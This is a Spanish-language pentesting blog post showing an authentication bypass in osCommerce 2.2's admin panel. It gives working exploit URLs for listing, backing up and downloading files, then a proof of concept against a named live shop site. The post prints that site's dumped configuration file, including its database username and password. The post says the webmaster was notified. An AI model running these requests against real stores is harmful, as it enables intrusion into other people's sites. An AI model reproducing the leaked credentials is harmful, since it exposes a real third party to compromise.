The Pentester

miércoles, 9 de junio de 2010

osComerce - Descargando Archivos?

Saludos, en esta oportunidad explotando una vulnerabilidad ya conocida en osCommerce 2.2.
para mas referencias:
/admin/file_manager.php/login.php?sh3n=do #Bypass /admin (podemos ver archivos)
/admin/backup.php/login.php?sh3n=do #Backup
/admin/file_manager.php/login.php?action=download&filename=sh3n.php #Descarga

#########################################################
# P.O.C - Prueba de Concepto - Real Case #
#########################################################
//El webmaster fue notificado previamente
//Get phun by sh3n

POST /admin/file_manager.php/login.php?sh3n=do
Host: sunnybunny.eu
Content-Type: application/x-www-form-urlencoded
Content-Length: 80


Descargando "Config.php"
Como muchos saben el config file es un archivo donde encontramos datos sobre la coneccion de la base de datos etc. Con una simple peticion podemos descargarlo..

GET admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
Host: sunnybunny.eu
Content-Type: application/x-www-form-urlencoded

Content-Length: 80

define('HTTP_SERVER', 'http://sunnybunny.eu');
define('HTTPS_SERVER', 'https://sunnybunny.eu');
define('ENABLE_SSL', false);
define('HTTP_COOKIE_DOMAIN', 'sunnybunny.eu');
define('HTTPS_COOKIE_DOMAIN', 'sunnybunny.eu');
define('HTTP_COOKIE_PATH', '/');
define('HTTPS_COOKIE_PATH', '/');
define('DIR_WS_HTTP_CATALOG', '/');
define('DIR_WS_HTTPS_CATALOG', '/');
define('DIR_WS_IMAGES', 'images/');
define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/');
define('DIR_WS_INCLUDES', 'includes/');
define('DIR_WS_BOXES', DIR_WS_INCLUDES . 'boxes/');
define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/');
define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/');
define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/');
define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/');

define('DIR_WS_DOWNLOAD_PUBLIC', 'pub/');
define('DIR_FS_CATALOG', '/home/kakdaspe/public_html/sunnybunny.eu/');
define('DIR_FS_DOWNLOAD', DIR_FS_CATALOG . 'download/');
define('DIR_FS_DOWNLOAD_PUBLIC', DIR_FS_CATALOG . 'pub/');

define('DB_SERVER', 'localhost');
define('DB_SERVER_USERNAME', 'kakdaspe_osc1');
define('DB_SERVER_PASSWORD', 'QQ7[cmqRncKn');
define('DB_DATABASE', 'kakdaspe_osc1');
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', 'mysql');
?>
Posted by at